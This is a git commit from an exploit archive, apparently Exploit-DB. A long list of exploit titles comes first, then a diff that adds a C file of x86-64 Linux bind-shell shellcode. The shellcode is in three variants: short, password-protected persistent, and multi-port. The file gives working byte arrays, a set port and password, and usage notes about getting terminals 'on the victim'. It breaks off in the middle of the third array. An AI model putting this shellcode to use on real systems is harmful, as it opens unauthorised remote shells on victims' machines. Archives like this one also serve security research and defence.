DB: 2016-07-20
4 new exploits Microsoft Internet Explorer Object Tag Exploit (MS03-020) Microsoft Internet Explorer - Object Tag Exploit (MS03-020) ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm) ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm) Cisco IOS IPv4 Packets Denial of Service Exploit Cisco IOS - IPv4 Packets Denial of Service Exploit Cisco IOS (using hping) Remote Denial of Service Exploit Cisco IOS - (using hping) Remote Denial of Service Exploit Microsoft Windows SQL Server Denial of Service Remote Exploit (MS03-031) Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031) Microsoft Windows RPC DCOM Remote Exploit (18 Targets) Microsoft Windows RPC - DCOM Remote Exploit (18 Targets) man-db 2.4.1 open_cat_stream() Local uid=man Exploit man-db 2.4.1 - open_cat_stream() Local uid=man Exploit Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow Exploit DameWare Mini Remote Control Server SYSTEM Exploit DameWare Mini Remote Control Server - SYSTEM Exploit Microsoft Internet Explorer Object Data Remote Exploit (M03-032) Microsoft Internet Explorer - Object Data Remote Exploit (M03-032) eMule/xMule/LMule OP_SERVERMESSAGE Format String Exploit eMule/xMule/LMule - OP_SERVERMESSAGE Format String Exploit Microsoft WordPerfect Document Converter Exploit (MS03-036) Microsoft WordPerfect Document Converter - Exploit (MS03-036) Roger Wilco 1.x Client Data Buffer Overflow Exploit Roger Wilco 1.x - Client Data Buffer Overflow Exploit Solaris Sadmind Default Configuration Remote Root Exploit Solaris Sadmind - Default Configuration Remote Root Exploit Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043) Microsoft Windows Messenger Service - Denial of Service Exploit (MS03-043) Microsoft Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046) Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046) Microsoft Frontpage Server Extensions fp30reg.dll Exploit (MS03-051) Microsoft Frontpage 
Server Extensions - fp30reg.dll Exploit (MS03-051) Microsoft Windows Workstation Service WKSSVC Remote Exploit (MS03-049) Microsoft Windows Workstation Service - WKSSVC Remote Exploit (MS03-049) Microsoft Windows XP Workstation Service Remote Exploit (MS03-049) Microsoft Windows XP Workstation Service - Remote Exploit (MS03-049) Microsoft Windows Messenger Service Remote Exploit FR (MS03-043) Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043) GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow Exploit Eudora 6.0.3 Attachment Spoofing Exploit (windows) Foxmail 5.0 PunyLib.dll Remote Stack Overflow Exploit Eudora 6.0.3 - Attachment Spoofing Exploit (Windows) Foxmail 5.0 - PunyLib.dll Remote Stack Overflow Exploit eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow Exploit OpenBSD 2.6 - / 2.7ftpd Remote Exploit OpenBSD 2.6 / 2.7ftpd - Remote Exploit Redhat 6.1 - / 6.2 TTY Flood Users Exploit Redhat 6.1 / 6.2 - TTY Flood Users Exploit Solaris 2.6 - / 7 / 8 Lock Users Out of mailx Exploit Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit Solaris 2.5 - / 2.5.1 getgrnam() Local Overflow Exploit Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow Exploit Solaris 7 - / 8-beta arp Local Overflow Exploit Solaris 7 / 8-beta - arp Local Overflow Exploit Solaris 2.6 - / 2.7 /usr/bin/write Local Overflow Exploit Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow Exploit Cisco Multiple Products Automated Exploit Tool Cisco Multiple Products - Automated Exploit Tool Microsoft Internet Explorer (11 bytes) Denial of Service Exploit Microsoft Internet Explorer - Denial of Service Exploit (11 bytes) PHP <= 4.3.7/ 5.0.0RC3 - memory_limit Remote Exploit PHP <= 4.3.7/5.0.0RC3 - memory_limit Remote Exploit VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) (updated) VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) GoodTech Telnet Server < 5.0.7 - 
Remote BoF Exploit (updated) GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (2) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2nd updated) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1st) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1) Maxwebportal <= 1.36 password.asp Change Password Exploit (3 - perl) Maxwebportal <= 1.36 password.asp Change Password Exploit (2 - php) Maxwebportal <= 1.36 password.asp Change Password Exploit (1 - html) Maxwebportal <= 1.36 password.asp Change Password Exploit (3) (perl) Maxwebportal <= 1.36 password.asp Change Password Exploit (2) (php) Maxwebportal <= 1.36 password.asp Change Password Exploit (1) (html) ProRat Server <= 1.9 - (Fix-2) Buffer Overflow Crash Exploit ProRat Server <= 1.9 (Fix-2) - Buffer Overflow Crash Exploit Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated) Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2) phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated) phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (2) Microsoft Windows - ACLs Local Privilege Escalation Exploit (Updated) Microsoft Windows - ACLs Local Privilege Escalation Exploit (2) HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (updated) HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (2) phpBB Journals System Mod 1.0.2 [RC2] - Remote File Include Exploit phpBB Journals System Mod 1.0.2 RC2 - Remote File Include Exploit Mozilla Firefox <= 1.5.0.7/ 2.0 - (createRange) Remote DoS Exploit Mozilla Firefox <= 1.5.0.7/2.0 - (createRange) Remote DoS Exploit BrowseDialog Class (ccrpbds6.dll) Multiple Methods DoS Exploit BrowseDialog Class - (ccrpbds6.dll) Multiple Methods DoS Exploit Asterisk <= 1.2.15 - / 1.4.0 pre-auth Remote Denial of Service Exploit Asterisk <= 1.2.15 / 1.4.0 - pre-auth Remote Denial of Service Exploit PHP < 4.4.5 - / 5.2.1 php_binary Session Deserialization Information Leak PHP < 4.4.5 - 
/ 5.2.1 WDDX Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 - php_binary Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 - WDDX Session Deserialization Information Leak PHP <= 4.4.6 - / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit PHP <= 4.4.6 / 5.2.1 - array_user_key_compare() ZVAL dtor Local Exploit PHP <= 4.4.6 - / 5.2.1 ext/gd Already Freed Resources Usage Exploit PHP <= 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit Asterisk <= 1.2.16 - / 1.4.1 SIP INVITE Remote Denial of Service Exploit Asterisk <= 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service Exploit PHP < 4.4.5 - / 5.2.1 _SESSION unset() Local Exploit PHP < 4.4.5 - / 5.2.1 _SESSION Deserialization Overwrite Exploit PHP < 4.4.5 - / 5.2.1 - _SESSION unset() Local Exploit PHP < 4.4.5 - / 5.2.1 - _SESSION Deserialization Overwrite Exploit PHP 4.4.5 - / 4.4.6 session_decode() Double Free Exploit PoC PHP 4.4.5 / 4.4.6 - session_decode() Double Free Exploit PoC XOOPS Module MyAds Bug Fix <= 2.04jp (index.php) SQL Injection Exploit XOOPS Module MyAds Bug Fix <= 2.04jp - (index.php) SQL Injection Exploit Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities Kaqoo Auction - (install_root) Multiple Remote File Include Vulnerabilities Asterisk < 1.2.22 - / 1.4.8 / 2.2.1 chan_skinny Remote Denial of Service Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities Weblogicnet - (files_dir) Multiple Remote File Inclusion Vulnerabilities PHP <= 4.4.7 - / 5.2.3 MySQL/MySQLi Safe Mode Bypass PHP <= 4.4.7 / 5.2.3 - MySQL/MySQLi Safe Mode Bypass EB Design Pty Ltd (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites EB Design Pty Ltd - (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities Lama Software 14.12.2007 - Multiple Remote File Inclusion Vulnerabilities sCssBoard (pwnpack) Multiple Versions 
Remote Exploit sCssBoard - (pwnpack) Multiple Versions Remote Exploit Data Dynamics ActiveBar (Actbar3.ocx 3.2) Multiple Insecure Methods Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities Shader TV (Beta) - Multiple Remote SQL Injection Vulnerabilities Keller Web Admin CMS 0.94 Pro Local File Inclusion Keller Web Admin CMS 0.94 Pro - Local File Inclusion Keller Web Admin CMS 0.94 Pro Local File Inclusion (1st) \o - Local File Inclusion (1st) HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit HRS Multi - (picture_pic_bv.asp key) Blind SQL Injection Exploit Kasra CMS (index.php) Multiple SQL Injection Vulnerabilities Kasra CMS - (index.php) Multiple SQL Injection Vulnerabilities Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1) Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Local Privilege Escalation Exploit (1) Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit Linux Kernel <= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit Mac OS X - Java applet Remote Deserialization Remote PoC (Updated) Mac OS X - Java applet Remote Deserialization Remote PoC (2) ZaoCMS (user_updated.php) Remote Change Password Exploit ZaoCMS - (user_updated.php) Remote Change Password Exploit eZoneScripts Hotornot2 Script (Admin Bypass) Multiple Remote Vulnerabilities eZoneScripts Hotornot2 Script - (Admin Bypass) Multiple Remote Vulnerabilities phpdirectorysource (XSS/SQL) Multiple Vulnerabilities phpdirectorysource - (XSS/SQL) Multiple Vulnerabilities Million-Dollar Pixel Ads Platinum (SQL/XSS) Multiple Vulnerabilities Million-Dollar Pixel Ads Platinum - (SQL/XSS) Multiple Vulnerabilities garagesalesjunkie (SQL/XSS) Multiple 
Vulnerabilities garagesalesjunkie - (SQL/XSS) Multiple Vulnerabilities Miniweb 2.0 Module Publisher (bSQL-XSS) Multiple Vulnerabilities Miniweb 2.0 Module Publisher - (bSQL/XSS) Multiple Vulnerabilities PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities PHP Script Forum Hoster - (Topic Delete/XSS) Multiple Vulnerabilities Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android) Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (Android) GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow PoC Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - sock_sendpage() Local Root (PPC) Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - 'sock_sendpage()' Local Root (PPC) phpMySite (XSS/SQLi) Multiple Vulnerabilities phpMySite - (XSS/SQLi) Multiple Vulnerabilities (Tod Miller's) Sudo/SudoEdit 1.6.x / 1.7.x (<= 1.6.9p21 / <= 1.7.2p4) - Local Root Exploit (Tod Miller's) Sudo/SudoEdit <= 1.6.9p21 / <= 1.7.2p4 - Local Root Exploit Preisschlacht Multi Liveshop System SQL Injection (seite&aid) index.php Preisschlacht Multi Liveshop System - SQL Injection (seite&aid) index.php quality point 1.0 newsfeed (SQL/XSS) Multiple Vulnerabilities quality point 1.0 newsfeed - (SQL/XSS) Multiple Vulnerabilities Open Web Analytics 1.2.3 multi file include Open Web Analytics 1.2.3 - multi file include Scratcher (SQL/XSS) Multiple Remote Scratcher - (SQL/XSS) Multiple Remote phpscripte24 Live Shopping Multi Portal System SQL Injection Exploit phpscripte24 Live Shopping Multi Portal System - SQL Injection Exploit e-webtech (fixed_page.asp) SQL Injection e-webtech - (fixed_page.asp) SQL Injection parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities parlic Design - (SQL/XSS/HTML) Multiple Vulnerabilities MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities MileHigh Creative - 
(SQL/XSS/HTML Injection) Multiple Vulnerabilities CMScout (XSS/HTML Injection) Multiple Vulnerabilities CMScout - (XSS/HTML Injection) Multiple Vulnerabilities k-search (SQL/XSS) Multiple Vulnerabilities k-search - (SQL/XSS) Multiple Vulnerabilities GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities GuestBook Script PHP - (XSS/HTML Injection) Multiple Vulnerabilities Max's Guestbook (HTML Injection/XSS) Multiple Vulnerabilities Max's Guestbook - (HTML Injection/XSS) Multiple Vulnerabilities Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities Joomla Component (com_jefaqpro) - Multiple Blind SQL Injection Vulnerabilities Joomla Component (com_restaurantguide) Multiple Vulnerabilities Joomla Component - (com_restaurantguide) Multiple Vulnerabilities TradeMC E-Ticaret (SQL/XSS) Multiple Vulnerabilities TradeMC E-Ticaret - (SQL/XSS) Multiple Vulnerabilities Projekt Shop (details.php) Multiple SQL Injection Vulnerabilities Projekt Shop - (details.php) Multiple SQL Injection Vulnerabilities CakePHP <= 1.3.5 - / 1.2.8 unserialize() CakePHP <= 1.3.5 / 1.2.8 - unserialize() Rae Media Real Estate Multi Agent SQL Injection Rae Media Real Estate Multi Agent - SQL Injection Solaris ypupdated Command Execution Solaris - ypupdated Command Execution CakePHP <= 1.3.5 - / 1.2.8 Cache Corruption Exploit CakePHP <= 1.3.5 / 1.2.8 - Cache Corruption Exploit Joomla HM-Community (com_hmcommunity) Multiple Vulnerabilities Joomla HM-Community - (com_hmcommunity) Multiple Vulnerabilities Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities CyberLink Multiple Products File Project Handling Stack Buffer Overflow PoC CyberLink Multiple Products - File Project Handling Stack Buffer Overflow PoC Ruby on Rails ActionPack Inline ERB Code Execution Ruby on Rails ActionPack Inline ERB - Code Execution HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 
RPC.YPUpdated Command Execution (1) HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (2) HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (1) HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (2) ASTPP VoIP Billing (4cf207a) Multiple Vulnerabilities ASTPP VoIP Billing (4cf207a) - Multiple Vulnerabilities Drummond Miles A1Stats 1.0 a1disp2.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 a1disp3.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 a1disp4.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - a1disp2.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - a1disp3.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - a1disp4.cgi Traversal Arbitrary File Read Symantec Norton Personal Firewall 2002/ Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness Oracle WebCenter Sites (FatWire Content Server) Multiple Vulnerabilities Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness Microsoft URLScan 2.5/RSA Security SecurID 5.0 - Configuration Enumeration Weakness WinSyslog Interactive Syslog Server 4.21/ long Message Remote Denial of Service WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service VocalTec VGW120/ VGW480 Telephony Gateway Remote H.225 - Denial of Service VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service Web Wiz Multiple Products SQL Injection Web Wiz Multiple Products - SQL Injection RealNetworks Multiple Products Multiple Buffer Overflow Vulnerabilities RealNetworks Multiple 
Products - Multiple Buffer Overflow Vulnerabilities Geodesic Solutions Multiple Products index.php b Parameter SQL Injection Geodesic Solutions Multiple Products - index.php b Parameter SQL Injection HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload Linux Kernel 2.6.x (<= 2.6.17.7) - NFS and EXT3 Combination Remote Denial of Service Linux Kernel <= 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness Apache HTTP Server <= 1.3.35 / <= 2.0.58 / <= 2.2.2 - Arbitrary HTTP Request Headers Security Weakness Symantec Multiple Products SymEvent Driver Local Denial of Service Symantec Multiple Products - SymEvent Driver Local Denial of Service FreeBSD 5.x I386_Set_LDT() Multiple Local Denial of Service Vulnerabilities FreeBSD 5.x I386_Set_LDT() - Multiple Local Denial of Service Vulnerabilities Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit Apache + PHP < 5.3.12 & < 5.4.2 - cgi-bin Remote Code Execution Exploit Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - Remote Code Execution (Multithreaded Scanner) Apache + PHP < 5.3.12 & < 5.4.2 - Remote Code Execution (Multithreaded Scanner) PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.php Cross-Site Scripting PHP Multi User Randomizer 2006.09.13 - Configure_Plugin.TPL.php Cross-Site Scripting Symantec Multiple Products SPBBCDrv Driver Local Denial of Service Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter XSS Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter XSS Exponent CMS 
0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing Simple OS CMS 0.1c_beta 'login.php' SQL Injection Simple OS CMS 0.1c_beta - 'login.php' SQL Injection WebcamXP 3.72.440/4.05.280 beta /pocketpc camnum Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 beta /show_gallery_pic id Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 beta - /pocketpc camnum Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 beta - /show_gallery_pic id Variable Arbitrary Memory Disclosure Adobe Flash Player 8/ 9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution IBM Maximo 4.1/ 5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities Symantec Multiple Products Client Proxy ActiveX (CLIproxy.dll) Remote Overflow Symantec Multiple Products - Client Proxy ActiveX (CLIproxy.dll) Remote Overflow Blog Ink (Blink) Multiple SQL Injection Vulnerabilities Blog Ink (Blink) - Multiple SQL Injection Vulnerabilities PHP Scripts Now Multiple Products bios.php rank Parameter XSS PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection PHP Scripts Now Multiple Products - bios.php rank Parameter XSS PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection cformsII 11.5/ 13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities cformsII 11.5/13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities Native Instruments Multiple Products DLL Loading Arbitrary Code Execution Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution PHP 5.x (< 5.6.2) - Bypass disable_functions Exploit (Shellshock) PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock) PHP 5.x (< 5.3.6) 'Zip' Extension - 'zip_fread()' 
Function Denial of Service PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS ManageEngine Multiple Products Authenticated File Upload ManageEngine Multiple Products - Authenticated File Upload BlueSoft Multiple Products Multiple SQL Injection Vulnerabilities BlueSoft Multiple Products - Multiple SQL Injection Vulnerabilities Ay Computer Multiple Products Multiple SQL Injection Vulnerabilities Ay Computer Multiple Products - Multiple SQL Injection Vulnerabilities net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities net4visions Multiple Products - 'dir' parameters Multiple Cross Site Scripting Vulnerabilities Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Privilege Escalation (Access /etc/shadow) Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow) Webify Multiple Products Multiple HTML Injection and Local File Include Vulnerabilities Webify Multiple Products - Multiple HTML Injection and Local File Include Vulnerabilities AirLive Multiple Products OS Command Injection AirLive Multiple Products - OS Command Injection Sciretech Multiple Products Multiple SQL Injection Vulnerabilities Sciretech Multiple Products - Multiple SQL Injection Vulnerabilities AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities AlienVault Open Source SIEM (OSSIM) - Multiple Cross Site Scripting Vulnerabilities Windows x86 - URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode (394 bytes) Windows x86 - URLDownloadToFileA() + 
SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes) Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes) Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit NewsP Free News Script 1.4.7 - User Credentials Disclosure newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure
This commit is contained in:
parent
acd30ed451
commit
965b4bba8f
5 changed files with 2086 additions and 162 deletions
161
platforms/lin_x86-64/shellcode/40122.txt
Executable file
@ -0,0 +1,161 @@
#include <stdio.h>
#include <string.h>
//| Exploit Title: [Syscall Persistent Bind Shell + (multi-terminal) + password + daemon (83, 148, 177 bytes)]
//| Date: [7/15/2016]
//| Exploit Author: [CripSlick]
//| Tested on: [Kali 2.0 x86_x64]
//| Version: [No Program Version, Only Syscalls Used]
//| ShepherdDowling@gmail.com
//| OffSec ID: OS-20614
//| http://50.112.22.183/
//|=========================================================================================
//|=============== CripSlick's Persistent Bind-Shell with Port-Range + password ============
//|
//|
//| CODE 3 Has everything to offer that CODE2 has and more. CODE2 has everything to offer
//| that CODE1 has and more. CODE1 is still great due to being a very short bind shell.
//| The point is that that there is really ONLY 1 shellcode here, it is just that CODE2 &
//| CODE1 have less features to cut down on byte count giving you more options.
//|
//| Troubleshooting:
//| 1. Problem: A lot of ports appeared on "nmap <IPv4> -p-" but not my port?
//| 1. Answer: This is common when you swap the high and low port
//|
//| 2. Problem: I disconnected and can't reconnect (even when I use the right password)
//| 2. Answer: This is common when re-executing the program (even after making changes)
//| Solve this by closing the terminal completly out, going to your directory
//| recompiling the program and then relaunching.
//|
//| If it is because you typed in the password wrong, wait about 60 seconds to
//| re-connect. No re-execution of the program is required to reconnect for
//| CODE2 & CODE3.
//|
//| 3. Problem: I DoS'd the victim
//| 3. Answer: This probably was because you set the port range too broad. A broad port range
//| takes a lot of CPU power. I suggest keeping it to how many terminals you need.
//|
#define PORT "\x11\x5a" // FORWARD BYTE ORDER
//| PORT: 4442
#define PASSWORD "\x6c\x61\x20\x63\x72\x69\x70\x73" // FORWARD BYTE ORDER
//| PASSWORD = "la crips"
//| ONLY CODE3 DOES NOT USE "PORT"; IT USES "LOW_PORT" & "HIGH_PORT"
#define HIGH_PORT "\x5f\x11" // REVERSE BYTE ORDER
#define LOW_PORT "\x5b\x11" // REVERSE BYTE ORDER
//| PORTS: 4443-4447 (remember 4443 doesn't count so 4444-4447)
//| (remember to use one terminal connection per open port)
//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!=======================
//| =========================================================================
//| CODE1 The short bind shell (83 bytes)
//| =========================================================================
//| This is the shortest bind-shell I could make. I leaned that mov byte takes
//| two bytes while Push+Pop takes 3 so I used more moves. Push+Pop is good if
//| you don't want to xor a register but your stack must be NULL on top.
//| This code only supports one terminal.
unsigned char CODE1[] = //replace CODE1 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x6a\x01\x5e\xb0\x29\x0f\x05\x48"
"\x97\x6a\x02\x66\xc7\x44\x24\x02"PORT"\x54\x5e\x52\xb2\x10\xb0\x31"
"\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x40\x88\xc7\x40\xb6\x03"
"\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xf6\x48\xf7\xe6\x50\x48\xbb"
"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!=======================
//| =========================================================================
//| CODE2 Persistent bind shell with a password (148 bytes)
//| =========================================================================
//| Supports re-connecting after a disconnect (close terminal and open up again)
//| If you type in a password wrong, wait 60 seconds to reconnect.
//| If you close the terminal after you enter the correct password, you can
//| immediatly reconnect.
//| This code only supports one terminal.
unsigned char CODE2[] = //replace CODE2 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
"\x48\x31\xff\x48\xf7\xe7\x48\x31\xf6\x6a\x39\x58\x0f\x05\x48\x31\xff"
"\x48\x39\xf8\x74\x79\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x6a\x01\x5e"
"\xb0\x29\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"PORT"\x54\x5e"
"\x52\xb2\x10\xb0\x31\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x40"
"\x88\xc7\x40\xb6\x03\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x89\xc7\x48"
"\x89\xc6\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"PASSWORD""
"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7"
"\xe6\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b"
"\x0f\x05\xe9\x6c\xff\xff\xff";
//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!=======================
//| =========================================================================
//| CODE3 Persistent bind shell with multi-port/terminal + password (177 bytes)
//| =========================================================================
//| This bind shell has everything COD2 has to offer + more while only 29 bytes more
//| You will get as many terminals on the victim as your PORT-RANGE minus 1
//| Your lowest port will NOT be open (so minus 1 port/terminal from your range)
//| Example: ports 4440-4445 = ports 4441-4445 usable = 5 terminals on victim
unsigned char CODE3[] = //replace CODE3 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
"\x48\x31\xf6\x56\x66\x68"HIGH_PORT"\x5b\x48\xff\xcb\x66\x81\xfb"LOW_PORT""
"\x75\x06\x50\x66\x68"HIGH_PORT"\x5b\x48\x31\xff\x48\xf7\xe7\xb0\x39\x0f"
"\x05\x48\x31\xff\x48\x39\xf8\x74\x7b\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02"
"\x6a\x01\x5e\xb0\x29\x0f\x05\x48\x97\x86\xdf\x6a\x02\x66\x89\x5c\x24\x02"
"\x86\xdf\x54\x5e\x52\xb2\x10\xb0\x31\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b"
